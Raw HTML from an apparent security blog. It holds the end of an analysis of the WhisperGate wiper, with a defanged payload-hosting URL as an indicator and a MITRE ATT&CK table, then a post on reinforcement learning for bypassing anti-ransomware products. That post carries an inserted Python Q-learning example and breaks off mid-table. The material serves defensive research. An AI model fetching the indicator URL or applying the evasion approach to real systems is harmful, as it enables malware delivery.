dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><span style="font-family: Arial; font-size: 10pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">URL </span></p></td><td style="border-bottom: solid #000000 1pt; border-color: rgb(0, 0, 0); border-left: solid #000000 1pt; border-right: solid #000000 1pt; border-style: solid; border-top: solid #000000 1pt; border-width: 1pt; overflow-wrap: break-word; overflow: hidden; padding: 5pt; vertical-align: top;"><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><span style="font-family: Arial; font-size: 10pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: 
pre-wrap;">https[:]//cdn[.]discordapp.com/attachments/928503440139771947/930108637681184768/Tbopbh.jpg</span></p></td></tr></tbody></table></div><br /><h3 dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span style="color: #434343; font-family: Arial; font-size: 14pt; font-variant-east-asian: normal; font-variant-numeric: normal; font-weight: 400; vertical-align: baseline; white-space: pre-wrap;">MITRE attack techniques</span></h3><br /><div align="left" dir="ltr" style="margin-left: 0.75pt;"><table style="border-collapse: collapse; border: none;"><colgroup><col width="149"></col><col width="499"></col></colgroup><tbody><tr style="height: 0pt;"><td style="border-bottom: solid #000000 1pt; border-color: rgb(0, 0, 0); border-left: solid #000000 1pt; border-right: solid #000000 1pt; border-style: solid; border-top: solid #000000 1pt; border-width: 1pt; overflow-wrap: break-word; overflow: hidden; padding: 5pt; vertical-align: top;"><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; font-weight: 700; vertical-align: baseline; white-space: pre-wrap;">Tactic</span></p></td><td style="border-bottom: solid #000000 1pt; border-color: rgb(0, 0, 0); border-left: solid #000000 1pt; border-right: solid #000000 1pt; border-style: solid; border-top: solid #000000 1pt; border-width: 1pt; overflow-wrap: break-word; overflow: hidden; padding: 5pt; vertical-align: top;"><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; font-weight: 700; vertical-align: baseline; white-space: pre-wrap;">Technique</span></p></td></tr><tr style="height: 23.0991pt;"><td style="border-bottom: solid #000000 1pt; border-color: rgb(0, 0, 0); border-left: solid #000000 1pt; border-right: solid #000000 1pt; 
border-style: solid; border-top: solid #000000 1pt; border-width: 1pt; overflow-wrap: break-word; overflow: hidden; padding: 5pt; vertical-align: top;"><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><span style="font-family: Arial; font-size: 9pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">Execution</span></p></td><td style="border-bottom: solid #000000 1pt; border-color: rgb(0, 0, 0); border-left: solid #000000 1pt; border-right: solid #000000 1pt; border-style: solid; border-top: solid #000000 1pt; border-width: 1pt; overflow-wrap: break-word; overflow: hidden; padding: 5pt; vertical-align: top;"><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><a href="https://attack.mitre.org/techniques/T1059/003" style="text-decoration-line: none;"><span style="color: #1155cc; font-family: Arial; font-size: 9pt; font-variant-east-asian: normal; font-variant-numeric: normal; text-decoration-line: underline; text-decoration-skip-ink: none; vertical-align: baseline; white-space: pre-wrap;">T1059.003 - Windows Command Shell</span></a></p><br /><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><a href="https://attack.mitre.org/techniques/T1059/001/" style="text-decoration-line: none;"><span style="color: #1155cc; font-family: Arial; font-size: 9pt; font-variant-east-asian: normal; font-variant-numeric: normal; text-decoration-line: underline; text-decoration-skip-ink: none; vertical-align: baseline; white-space: pre-wrap;">T1059.001 – Command and Scripting Interpreter: PowerShell</span></a></p></td></tr><tr style="height: 25.5pt;"><td style="border-bottom: solid #000000 1pt; border-color: rgb(0, 0, 0); border-left: solid #000000 1pt; border-right: solid #000000 1pt; border-style: solid; border-top: solid #000000 1pt; border-width: 1pt; overflow-wrap: break-word; overflow: hidden; padding: 5pt; vertical-align: top;"><p dir="ltr" 
style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><span style="font-family: Arial; font-size: 9pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">Defense evasion</span></p></td><td style="border-bottom: solid #000000 1pt; border-color: rgb(0, 0, 0); border-left: solid #000000 1pt; border-right: solid #000000 1pt; border-style: solid; border-top: solid #000000 1pt; border-width: 1pt; overflow-wrap: break-word; overflow: hidden; padding: 5pt; vertical-align: top;"><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><a href="https://attack.mitre.org/techniques/T1542/003/" style="text-decoration-line: none;"><span style="color: #1155cc; font-family: Arial; font-size: 9pt; font-variant-east-asian: normal; font-variant-numeric: normal; text-decoration-line: underline; text-decoration-skip-ink: none; vertical-align: baseline; white-space: pre-wrap;">T1542.003 – Pre-OS Boot: Bootkit</span></a></p><br /><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><a href="https://attack.mitre.org/techniques/T1027/" style="text-decoration-line: none;"><span style="color: #1155cc; font-family: Arial; font-size: 9pt; font-variant-east-asian: normal; font-variant-numeric: normal; text-decoration-line: underline; text-decoration-skip-ink: none; vertical-align: baseline; white-space: pre-wrap;">T1027 – Obfuscated Files or Information</span></a></p><br /><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><a href="https://attack.mitre.org/techniques/T1055/012/" style="text-decoration-line: none;"><span style="color: #1155cc; font-family: Arial; font-size: 9pt; font-variant-east-asian: normal; font-variant-numeric: normal; text-decoration-line: underline; text-decoration-skip-ink: none; vertical-align: baseline; white-space: pre-wrap;">T1055.012 – Process Injection: Process Hollowing</span></a></p></td></tr><tr style="height: 24.0912pt;"><td 
style="border-bottom: solid #000000 1pt; border-color: rgb(0, 0, 0); border-left: solid #000000 1pt; border-right: solid #000000 1pt; border-style: solid; border-top: solid #000000 1pt; border-width: 1pt; overflow-wrap: break-word; overflow: hidden; padding: 5pt; vertical-align: top;"><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><span style="font-family: Arial; font-size: 9pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">Discovery</span></p></td><td style="border-bottom: solid #000000 1pt; border-color: rgb(0, 0, 0); border-left: solid #000000 1pt; border-right: solid #000000 1pt; border-style: solid; border-top: solid #000000 1pt; border-width: 1pt; overflow-wrap: break-word; overflow: hidden; padding: 5pt; vertical-align: top;"><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><a href="https://attack.mitre.org/techniques/T1083/" style="text-decoration-line: none;"><span style="color: #1155cc; font-family: Arial; font-size: 9pt; font-variant-east-asian: normal; font-variant-numeric: normal; text-decoration-line: underline; text-decoration-skip-ink: none; vertical-align: baseline; white-space: pre-wrap;">T1083 – File and Directory Discovery</span></a></p></td></tr><tr style="height: 24pt;"><td style="border-bottom: solid #000000 1pt; border-color: rgb(0, 0, 0); border-left: solid #000000 1pt; border-right: solid #000000 1pt; border-style: solid; border-top: solid #000000 1pt; border-width: 1pt; overflow-wrap: break-word; overflow: hidden; padding: 5pt; vertical-align: top;"><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><span style="font-family: Arial; font-size: 9pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">Command and Control</span></p></td><td style="border-bottom: solid #000000 1pt; border-color: rgb(0, 0, 0); border-left: solid #000000 
1pt; border-right: solid #000000 1pt; border-style: solid; border-top: solid #000000 1pt; border-width: 1pt; overflow-wrap: break-word; overflow: hidden; padding: 5pt; vertical-align: top;"><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><a href="https://attack.mitre.org/techniques/T1105/" style="text-decoration-line: none;"><span style="color: #1155cc; font-family: Arial; font-size: 9pt; font-variant-east-asian: normal; font-variant-numeric: normal; text-decoration-line: underline; text-decoration-skip-ink: none; vertical-align: baseline; white-space: pre-wrap;">T1105 – Ingress Tool Transfer</span></a></p></td></tr><tr style="height: 23.25pt;"><td style="border-bottom: solid #000000 1pt; border-color: rgb(0, 0, 0); border-left: solid #000000 1pt; border-right: solid #000000 1pt; border-style: solid; border-top: solid #000000 1pt; border-width: 1pt; overflow-wrap: break-word; overflow: hidden; padding: 5pt; vertical-align: top;"><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><span style="font-family: Arial; font-size: 9pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">Impact</span></p></td><td style="border-bottom: solid #000000 1pt; border-color: rgb(0, 0, 0); border-left: solid #000000 1pt; border-right: solid #000000 1pt; border-style: solid; border-top: solid #000000 1pt; border-width: 1pt; overflow-wrap: break-word; overflow: hidden; padding: 5pt; vertical-align: top;"><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><a href="https://attack.mitre.org/techniques/T1485/" style="text-decoration-line: none;"><span style="color: #1155cc; font-family: Arial; font-size: 9pt; font-variant-east-asian: normal; font-variant-numeric: normal; text-decoration-line: underline; text-decoration-skip-ink: none; vertical-align: baseline; white-space: pre-wrap;">T1485 – Data Destruction</span></a></p><br /><p dir="ltr" 
style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><a href="https://attack.mitre.org/techniques/T1561/" style="text-decoration-line: none;"><span style="color: #1155cc; font-family: Arial; font-size: 9pt; font-variant-east-asian: normal; font-variant-numeric: normal; text-decoration-line: underline; text-decoration-skip-ink: none; vertical-align: baseline; white-space: pre-wrap;">T1561 – Disk Wipe</span></a></p></td></tr></tbody></table></div><br /><br /><h2 dir="ltr" style="line-height: 1.38; margin-bottom: 6pt; margin-top: 0pt;"><span style="font-family: Arial; font-size: 16pt; font-variant-east-asian: normal; font-variant-numeric: normal; font-weight: 400; vertical-align: baseline; white-space: pre-wrap;">References</span></h2><ol style="margin-bottom: 0px; margin-top: 0px; padding-inline-start: 48px;"><li aria-level="1" dir="ltr" style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; list-style-type: decimal; vertical-align: baseline; white-space: pre;"><p dir="ltr" role="presentation" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">Lecture recording <a href="https://www.youtube.com/watch?v=XxN4cINiLqA">https://www.youtube.com/watch?v=XxN4cINiLqA</a></p></li><li aria-level="1" dir="ltr" style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; list-style-type: decimal; vertical-align: baseline; white-space: pre;"><p dir="ltr" role="presentation" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><a href="https://www.microsoft.com/security/blog/2022/01/15/destructive-malware-targeting-ukrainian-organizations/" style="text-decoration-line: none;"><span style="color: #1155cc; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; text-decoration-line: underline; text-decoration-skip-ink: none; vertical-align: baseline; white-space: 
pre-wrap;">https://www.microsoft.com/security/blog/2022/01/15/destructive-malware-targeting-ukrainian-organizations/</span></a></p></li><li aria-level="1" dir="ltr" style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; list-style-type: decimal; vertical-align: baseline; white-space: pre;"><p dir="ltr" role="presentation" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><a href="https://www.bleepingcomputer.com/news/security/microsoft-fake-ransomware-targets-ukraine-in-data-wiping-attacks/" style="text-decoration-line: none;"><span style="color: #1155cc; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; text-decoration-line: underline; text-decoration-skip-ink: none; vertical-align: baseline; white-space: pre-wrap;">https://www.bleepingcomputer.com/news/security/microsoft-fake-ransomware-targets-ukraine-in-data-wiping-attacks/</span></a><span style="font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"> </span></p></li><li aria-level="1" dir="ltr" style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; list-style-type: decimal; vertical-align: baseline; white-space: pre;"><p dir="ltr" role="presentation" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><a href="https://medium.com/s2wblog/analysis-of-destructive-malware-whispergate-targeting-ukraine-9d5d158f19f3" style="text-decoration-line: none;"><span style="color: #1155cc; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; text-decoration-line: underline; text-decoration-skip-ink: none; vertical-align: baseline; white-space: pre-wrap;">https://medium.com/s2wblog/analysis-of-destructive-malware-whispergate-targeting-ukraine-9d5d158f19f3</span></a></p></li><li aria-level="1" dir="ltr" style="font-family: Arial; font-size: 11pt; 
font-variant-east-asian: normal; font-variant-numeric: normal; list-style-type: decimal; vertical-align: baseline; white-space: pre;"><p dir="ltr" role="presentation" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span style="font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><a href="https://cert.gov.ua/article/18101">https://cert.gov.ua/article/18101</a> </span></p></li></ol><br /><br /><br /><br />Alexander Adamovhttp://www.blogger.com/profile/10336415028200154730noreply@blogger.com0tag:blogger.com,1999:blog-4482404627541610819.post-14480479319314188732020-10-02T09:29:00.008-07:002021-11-20T00:38:00.246-08:00Reinforcement Learning for Anti-Ransomware Testing<p></p><div class="separator" style="clear: both; text-align: center;"><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEivABqz0gH4SztkQ9P7UKudP4L-FXBYKZGx4SVTkH5Y4wY4yRCh2rUtJtBa7pASOSrdv4KHIO3wf5RkEdUatDXIZMZnI3vwOjB0edtPxOpkrh3ROINidnAa1_g28JsUASakV95XIKEdZ7hI/s1530/RanSim.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="838" data-original-width="1530" height="350" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEivABqz0gH4SztkQ9P7UKudP4L-FXBYKZGx4SVTkH5Y4wY4yRCh2rUtJtBa7pASOSrdv4KHIO3wf5RkEdUatDXIZMZnI3vwOjB0edtPxOpkrh3ROINidnAa1_g28JsUASakV95XIKEdZ7hI/w640-h350/RanSim.png" width="640" /></a></div></div><br /><br />ML models have established themselves as a powerful tool for cyberdefense. AI/ML is heavily used in antivirus (EDR), Next-Gen Firewall, and SIEM (SOAR) solutions to solve the classification problem as well as to discover anomalous behavior that may indicate the presence of an attacker, with the help of Supervised and Unsupervised Learning. 
Deep Learning helps to filter spam emails and flag fake news to protect users against disinformation [1].<p></p><span><a name='more'></a></span><p>So what about AI in security testing, such as penetration and anti-malware testing? An interesting application of AI can be found in the work titled ‘Autonomous Penetration Testing using Reinforcement Learning’ by J. Schwartz from the University of Queensland [2], where he proposes to use Reinforcement Learning (RL) for network penetration testing to find the optimal attack path.</p><span id="docs-internal-guid-cb93a4dc-7fff-cf65-0ecd-8bed8bf1c779"><div>We decided to investigate how ML can be applied to testing anti-ransomware solutions. In particular, RL was chosen for generating ransomware models and finding the optimal test strategy to bypass an anti-ransomware solution. </div><div><br /></div><div>RL is well known as a way to train a computer to play strategy games. For example, AlphaGo, a computer program designed by DeepMind, has established itself as the best Go and chess player in the world as a result of playing many times against other instances of itself to improve its play with RL [3]. 
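To make the Q(S, A) table shown further down concrete, here is an added example (not the authors' code, and not their ransomware simulator): textbook tabular Q-learning run on a small constructed chain-walk environment. States are integers, two actions advance the counter by different step sizes, one intermediate state is a terminal trap with a penalty, and the goal state pays a reward. The state count, the trap position, the rewards and the hyperparameters alpha, gamma and epsilon are all assumed values chosen for the toy. The learned table has one row per action and one column per state, like the table in the post, and the greedy policy is the argmax of each column.

```python
"""Tabular Q-learning on a constructed chain-walk MDP.

Example code added to illustrate how a Q(S, A) table like the one in the post
is produced; it is not the authors' code and does not model their ransomware
simulator.  The environment, rewards and hyperparameters are all assumed
values chosen for the toy.
"""
import random

N_STATES = 7            # states 0..6; state 6 is the goal (constructed)
GOAL = N_STATES - 1
TRAP = 3                # terminal state with a penalty (constructed)
STEP_SIZES = [1, 2]     # action 0 moves +1, action 1 moves +2
N_ACTIONS = len(STEP_SIZES)


def step(state, action):
    """Deterministic transition: returns (next_state, reward, done)."""
    nxt = min(state + STEP_SIZES[action], GOAL)
    if nxt == TRAP:
        return nxt, -10.0, True      # episode ends with a penalty
    if nxt == GOAL:
        return nxt, 10.0, True       # episode ends with the goal reward
    return nxt, -1.0, False          # per-step cost favours short paths


def q_learning(episodes=2000, alpha=0.1, gamma=0.9, epsilon=0.2, seed=0):
    """Off-policy TD control.  Returns q[action][state], i.e. one row per
    action and one column per state, the same layout as the post's table."""
    rng = random.Random(seed)
    q = [[0.0] * N_STATES for _ in range(N_ACTIONS)]
    for _ in range(episodes):
        s, done = 0, False
        while not done:
            # epsilon-greedy behaviour policy: explore with probability epsilon
            if rng.random() < epsilon:
                a = rng.randrange(N_ACTIONS)
            else:
                a = max(range(N_ACTIONS), key=lambda k: q[k][s])
            s2, r, done = step(s, a)
            # Bellman target uses the greedy value of the next state
            best_next = 0.0 if done else max(q[k][s2] for k in range(N_ACTIONS))
            q[a][s] += alpha * (r + gamma * best_next - q[a][s])
            s = s2
    return q


def greedy_policy(q):
    """Argmax over the action rows for every non-terminal state."""
    return {s: max(range(N_ACTIONS), key=lambda k: q[k][s])
            for s in range(N_STATES) if s not in (TRAP, GOAL)}


def print_table(q):
    """Print the table in the post's layout: actions as rows, states as columns."""
    print("Q(S, A) " + " ".join(f"{s:>8d}" for s in range(N_STATES)))
    for a in range(N_ACTIONS):
        print(f"a={a:<5d} " + " ".join(f"{v:8.3f}" for v in q[a]))


if __name__ == "__main__":
    table = q_learning()
    print_table(table)
    print("greedy policy:", greedy_policy(table))
```

Running the block prints the table; `q_learning` returns it as `q[action][state]`, and `greedy_policy` shows that the agent learns to use the +2 action from states 0, 2 and 4 (jumping over the trap) and the +1 step from state 1. The entries are estimates from an epsilon-greedy run, so they approach but do not exactly equal the Bellman optimum (for example Q*(4, +2) = 10 and Q*(2, +2) = -1 + 0.9 * 10 = 8).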
</div><div><br /></div><div>Download the <a href="https://drive.google.com/file/d/1RRXGInCt8lapn-MSUTUKlRWPiV7I-Tih/view?usp=sharing">slides</a>.</div><div>Video: <a href="https://www.youtube.com/watch?v=-jtjCjc3r9I">https://www.youtube.com/watch?v=-jtjCjc3r9I</a></div><div>The paper (PDF): <a href="https://ieeexplore.ieee.org/document/9225141">https://ieeexplore.ieee.org/document/9225141</a></div><div>Ransomware simulator <a href="https://youtu.be/SoRz1ls2kZQ" target="_blank">demo</a>.</div><div><br /></div><div>Some of the research results are highlighted below:</div><div><span id="docs-internal-guid-7f4518fc-7fff-f9e9-841f-dfaf70220e05"><img height="332" src="https://lh5.googleusercontent.com/2H56ONDUFtcAHT1kif0wDY1IKCfXL0CC4Jj0Cx64Ob3UO35jWLtTeUAzn0L2pl19VR_MJsP4z5GAdgVSUanXzpVMIDm_ExoJmEmAV1xsbBJ_qEdkPfGv4EOgt6DoNALhcOi7xiRiY9A=w640-h332" title="Chart" width="640" /></span></div><div><span><img height="401px;" src="https://lh4.googleusercontent.com/ks-OksfKy8209UZGqe3pt9H1P68lfoiPQIvwHcGT14c_Jxj7oCL9wsATqmOr0EQEN62f7GTSN7OvyZrK38vr73H095sQPv7sAMrsWOepR8U1KG9UVoriNdCEllLkRXkACR1qKWtnKEg" title="Chart" width="649px;" /></span></div><div><br /></div><div><span id="docs-internal-guid-6f957a6e-7fff-c296-cea4-f8cd55d5e4b2"><img height="329" src="https://lh3.googleusercontent.com/Flx4aQHx9SXTOpn4DqDz9WuLFr_gGrlDXX1zI7k4FvBQFSVSmuv9aPrFt1fRmmHupbw13oQC2LoA6pliko6lE4Z6CWJNl9kIDKCmV6OOjfCy34zUDOT3Gsv2V0LFiIYwAEuopLs8-yw=w640-h329" title="Chart" width="640" /></span></div><div><span><google-sheets-html-origin><table border="1" cellpadding="0" cellspacing="0" dir="ltr" style="border-collapse: collapse; border: none; font-family: Arial; font-size: 10pt; table-layout: fixed; width: 0px;" xmlns="http://www.w3.org/1999/xhtml"><colgroup><col width="100"></col><col width="76"></col><col width="82"></col><col width="86"></col><col width="75"></col><col width="76"></col><col width="77"></col><col width="80"></col><col width="75"></col><col width="77"></col><col 
width="71"></col><col width="60"></col></colgroup><tbody><tr style="height: 21px;"><td data-sheets-value="{"1":2,"2":"Q (S, A)"}" style="border-color: rgb(0, 0, 0) rgb(204, 204, 204) rgb(204, 204, 204) rgb(0, 0, 0); border-image: initial; border-style: solid; border-width: 1px; font-weight: bold; overflow: hidden; padding: 2px 3px; text-align: center; vertical-align: bottom;">Q (S, A)</td><td data-sheets-value="{"1":2,"2":"States"}" style="background-color: #c9daf8; border-color: rgb(0, 0, 0) rgb(204, 204, 204) rgb(204, 204, 204); border-image: initial; border-style: solid; border-width: 1px; font-weight: bold; overflow: hidden; padding: 2px 3px; text-align: center; vertical-align: bottom;">States</td><td style="border-color: rgb(0, 0, 0) rgb(204, 204, 204) rgb(204, 204, 204); border-image: initial; border-style: solid; border-width: 1px; overflow: hidden; padding: 2px 3px; vertical-align: bottom;"></td><td style="border-color: rgb(0, 0, 0) rgb(204, 204, 204) rgb(204, 204, 204); border-image: initial; border-style: solid; border-width: 1px; overflow: hidden; padding: 2px 3px; vertical-align: bottom;"></td><td style="border-color: rgb(0, 0, 0) rgb(204, 204, 204) rgb(204, 204, 204); border-image: initial; border-style: solid; border-width: 1px; overflow: hidden; padding: 2px 3px; vertical-align: bottom;"></td><td style="border-color: rgb(0, 0, 0) rgb(204, 204, 204) rgb(204, 204, 204); border-image: initial; border-style: solid; border-width: 1px; overflow: hidden; padding: 2px 3px; vertical-align: bottom;"></td><td style="border-color: rgb(0, 0, 0) rgb(204, 204, 204) rgb(204, 204, 204); border-image: initial; border-style: solid; border-width: 1px; overflow: hidden; padding: 2px 3px; vertical-align: bottom;"></td><td style="border-color: rgb(0, 0, 0) rgb(204, 204, 204) rgb(204, 204, 204); border-image: initial; border-style: solid; border-width: 1px; overflow: hidden; padding: 2px 3px; vertical-align: bottom;"></td><td style="border-color: rgb(0, 0, 0) rgb(204, 204, 
204) rgb(204, 204, 204); border-image: initial; border-style: solid; border-width: 1px; overflow: hidden; padding: 2px 3px; vertical-align: bottom;"></td><td data-sheets-value="{"1":2,"2":"Threshold"}" style="border-color: rgb(0, 0, 0) rgb(204, 204, 204) rgb(204, 204, 204); border-image: initial; border-style: solid; border-width: 1px; font-weight: bold; overflow: hidden; padding: 2px 3px; text-align: center; vertical-align: bottom;">Threshold</td><td style="border-color: rgb(0, 0, 0) rgb(204, 204, 204) rgb(204, 204, 204); border-image: initial; border-style: solid; border-width: 1px; overflow: hidden; padding: 2px 3px; vertical-align: bottom;"></td><td style="border-color: rgb(0, 0, 0) rgb(0, 0, 0) rgb(204, 204, 204) rgb(204, 204, 204); border-image: initial; border-style: solid; border-width: 1px; overflow: hidden; padding: 2px 3px; vertical-align: bottom;"></td></tr><tr style="height: 21px;"><td data-sheets-value="{"1":2,"2":"Actions"}" style="background-color: #ead1dc; border-color: rgb(204, 204, 204) rgb(204, 204, 204) rgb(204, 204, 204) rgb(0, 0, 0); border-image: initial; border-style: solid; border-width: 1px; font-weight: bold; overflow: hidden; padding: 2px 3px; text-align: center; vertical-align: bottom;">Actions</td><td data-sheets-value="{"1":3,"3":0}" style="background-color: #c9daf8; border: 1px solid rgb(204, 204, 204); overflow: hidden; padding: 2px 3px; text-align: center; vertical-align: bottom;">0</td><td data-sheets-formula="=R[0]C[-1]+1" data-sheets-value="{"1":3,"3":1}" style="background-color: #c9daf8; border: 1px solid rgb(204, 204, 204); overflow: hidden; padding: 2px 3px; text-align: center; vertical-align: bottom;">1</td><td data-sheets-formula="=R[0]C[-1]+1" data-sheets-value="{"1":3,"3":2}" style="background-color: #c9daf8; border: 1px solid rgb(204, 204, 204); overflow: hidden; padding: 2px 3px; text-align: center; vertical-align: bottom;">2</td><td data-sheets-formula="=R[0]C[-1]+1" data-sheets-value="{"1":3,"3":3}" 
style="background-color: #c9daf8; border: 1px solid rgb(204, 204, 204); overflow: hidden; padding: 2px 3px; text-align: center; vertical-align: bottom;">3</td><td data-sheets-formula="=R[0]C[-1]+1" data-sheets-value="{"1":3,"3":4}" style="background-color: #c9daf8; border: 1px solid rgb(204, 204, 204); overflow: hidden; padding: 2px 3px; text-align: center; vertical-align: bottom;">4</td><td data-sheets-formula="=R[0]C[-1]+1" data-sheets-value="{"1":3,"3":5}" style="background-color: #c9daf8; border: 1px solid rgb(204, 204, 204); overflow: hidden; padding: 2px 3px; text-align: center; vertical-align: bottom;">5</td><td data-sheets-formula="=R[0]C[-1]+1" data-sheets-value="{"1":3,"3":6}" style="background-color: #c9daf8; border: 1px solid rgb(204, 204, 204); overflow: hidden; padding: 2px 3px; text-align: center; vertical-align: bottom;">6</td><td data-sheets-formula="=R[0]C[-1]+1" data-sheets-value="{"1":3,"3":7}" style="background-color: #c9daf8; border: 1px solid rgb(204, 204, 204); overflow: hidden; padding: 2px 3px; text-align: center; vertical-align: bottom;">7</td><td data-sheets-formula="=R[0]C[-1]+1" data-sheets-value="{"1":3,"3":8}" style="background-color: #ea9999; border: 1px solid rgb(204, 204, 204); overflow: hidden; padding: 2px 3px; text-align: center; vertical-align: bottom;">8</td><td data-sheets-formula="=R[0]C[-1]+1" data-sheets-value="{"1":3,"3":9}" style="background-color: #c9daf8; border: 1px solid rgb(204, 204, 204); overflow: hidden; padding: 2px 3px; text-align: center; vertical-align: bottom;">9</td><td data-sheets-formula="=R[0]C[-1]+1" data-sheets-value="{"1":3,"3":10}" style="background-color: #c9daf8; border-color: rgb(204, 204, 204) rgb(0, 0, 0) rgb(204, 204, 204) rgb(204, 204, 204); border-image: initial; border-style: solid; border-width: 1px; overflow: hidden; padding: 2px 3px; text-align: center; vertical-align: bottom;">10</td></tr><tr style="height: 21px;"><td data-sheets-value="{"1":3,"3":0}" style="background-color: #ead1dc; 
border-color: rgb(204, 204, 204) rgb(204, 204, 204) rgb(204, 204, 204) rgb(0, 0, 0); border-image: initial; border-style: solid; border-width: 1px; font-weight: bold; overflow: hidden; padding: 2px 3px; text-align: center; vertical-align: bottom;">0</td><td data-sheets-value="{"1":3,"3":3.742632}" style="border: 1px solid rgb(204, 204, 204); font-family: Calibri; font-size: 11pt; overflow: hidden; padding: 2px 3px; text-align: right; vertical-align: bottom;">3.742632</td><td data-sheets-value="{"1":3,"3":0.787156}" style="border: 1px solid rgb(204, 204, 204); font-family: Calibri; font-size: 11pt; overflow: hidden; padding: 2px 3px; text-align: right; vertical-align: bottom;">0.787156</td><td data-sheets-value="{"1":3,"3":0.50037}" style="border: 1px solid rgb(204, 204, 204); font-family: Calibri; font-size: 11pt; overflow: hidden; padding: 2px 3px; text-align: right; vertical-align: bottom;">0.50037</td><td data-sheets-value="{"1":3,"3":0}" style="border: 1px solid rgb(204, 204, 204); font-family: Calibri; font-size: 11pt; overflow: hidden; padding: 2px 3px; text-align: right; vertical-align: bottom;">0</td><td data-sheets-value="{"1":3,"3":0}" style="border: 1px solid rgb(204, 204, 204); font-family: Calibri; font-size: 11pt; overflow: hidden; padding: 2px 3px; text-align: right; vertical-align: bottom;">0</td><td data-sheets-value="{"1":3,"3":1.007811}" style="border: 1px solid rgb(204, 204, 204); font-family: Calibri; font-size: 11pt; overflow: hidden; padding: 2px 3px; text-align: right; vertical-align: bottom;">1.007811</td><td data-sheets-value="{"1":3,"3":0.119928}" style="border: 1px solid rgb(204, 204, 204); font-family: Calibri; font-size: 11pt; overflow: hidden; padding: 2px 3px; text-align: right; vertical-align: bottom;">0.119928</td><td data-sheets-value="{"1":3,"3":2.686471}" style="background-color: #d9ead3; border: 1px solid rgb(204, 204, 204); font-family: Calibri; font-size: 11pt; overflow: hidden; padding: 2px 3px; text-align: right; 
vertical-align: bottom;">2.686471</td><td data-sheets-value="{"1":3,"3":1.771443}" style="background-color: #d9ead3; border: 1px solid rgb(204, 204, 204); font-family: Calibri; font-size: 11pt; overflow: hidden; padding: 2px 3px; text-align: right; vertical-align: bottom;">1.771443</td><td data-sheets-value="{"1":3,"3":0}" style="border: 1px solid rgb(204, 204, 204); font-family: Calibri; font-size: 11pt; overflow: hidden; padding: 2px 3px; text-align: right; vertical-align: bottom;">0</td><td colspan="1" data-sheets-value="{"1":2,"2":"all files are encrypted"}" rowspan="16" style="border-color: rgb(204, 204, 204) rgb(0, 0, 0) rgb(0, 0, 0) rgb(204, 204, 204); border-image: initial; border-style: solid; border-width: 1px; font-family: Calibri; font-size: 18pt; overflow: hidden; padding: 2px 3px; text-align: center; vertical-align: middle;"><div style="max-height: 336px;">all files are encrypted</div></td></tr><tr style="height: 21px;"><td data-sheets-formula="=R[-1]C[0]+1" data-sheets-value="{"1":3,"3":1}" style="background-color: #ead1dc; border-color: rgb(204, 204, 204) rgb(204, 204, 204) rgb(204, 204, 204) rgb(0, 0, 0); border-image: initial; border-style: solid; border-width: 1px; font-weight: bold; overflow: hidden; padding: 2px 3px; text-align: center; vertical-align: bottom;">1</td><td data-sheets-value="{"1":3,"3":7.105196}" style="border: 1px solid rgb(204, 204, 204); font-family: Calibri; font-size: 11pt; overflow: hidden; 